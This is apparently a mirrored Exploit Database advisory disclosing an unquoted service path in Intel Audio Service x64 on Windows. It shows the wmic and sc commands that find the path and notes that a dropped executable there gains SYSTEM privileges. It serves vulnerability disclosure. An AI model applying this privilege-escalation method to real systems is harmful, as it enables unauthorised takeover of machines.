Intel(R) Audio Service x64 01.00.1080.0 – ‘IntelAudioService’ Unquoted Service Path

• Exploit Database
• 35 阅读

• 作者： Geovanni Ruiz
  日期： 2021-06-02
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49929/

• # Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
  # Date: 06-01-2021
  # Exploit Author: Geovanni Ruiz
  # Vendor Homepage: https://www.intel.com
  # Software Version: 01.00.1080.0
  # File Version: 1.00.1080.0
  # Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es
  # Vulnerability Type: Unquoted Service Path
  
  
  # 1. To find the unquoted service path vulnerability
  
  C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname
  
  DisplayName Name PathName StartModeStartName
  Intel(R) Audio ServiceIntelAudioServiceC:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exeAuto LocalSystem
  
  
  # 2. To check service info:
  
  C:\>sc qc "IntelAudioService"
  [SC] QueryServiceConfig CORRECTO
  		
  NOMBRE_SERVICIO: IntelAudioService
  TIPO : 10WIN32_OWN_PROCESS
  TIPO_INICIO: 2 AUTO_START
  CONTROL_ERROR: 1 NORMAL
  NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe
  GRUPO_ORDEN_CARGA:
  ETIQUETA : 0
  NOMBRE_MOSTRAR : Intel(R) Audio Service
  DEPENDENCIAS :
  NOMBRE_INICIO_SERVICIO: LocalSystem
  
  # 3. Exploit:
  
  To exploit this vulnerability an attacker requires drop a malicious executable into the service path undetected by the OS in order
  to gain SYSTEM privileges.